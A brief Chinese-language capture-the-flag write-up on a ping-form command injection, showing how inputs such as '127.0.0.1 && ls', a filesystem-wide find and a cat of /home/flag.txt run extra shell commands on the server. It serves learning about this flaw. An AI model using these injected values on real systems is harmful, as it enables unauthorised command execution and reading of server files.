首先,尝试ping一下127.0.0.1,如果能ping成功,尝试使用&&执行命令行,因为市面上绝大多数的服务器都是Linux操作系统,不妨首先使用Linux命令做尝试,首先,在输入框里输入
127.0.0.1 && ls
如果能够看到目录,那就说明存在我们能够控制的rce漏洞的点,之后,我们就可以尝试使用find命令来查找flag文件,或者,我们可以试着构造
127.0.0.1 && find / -name 'flag*' #可以猜测本题的flag放在名为flag的文件里
得到的回显可以看到,在/home中有一个flag.txt文件,那么使用cat语句查看这个文件
127.0.0.1 && cat /home/flag.txt
最后得到flag的值。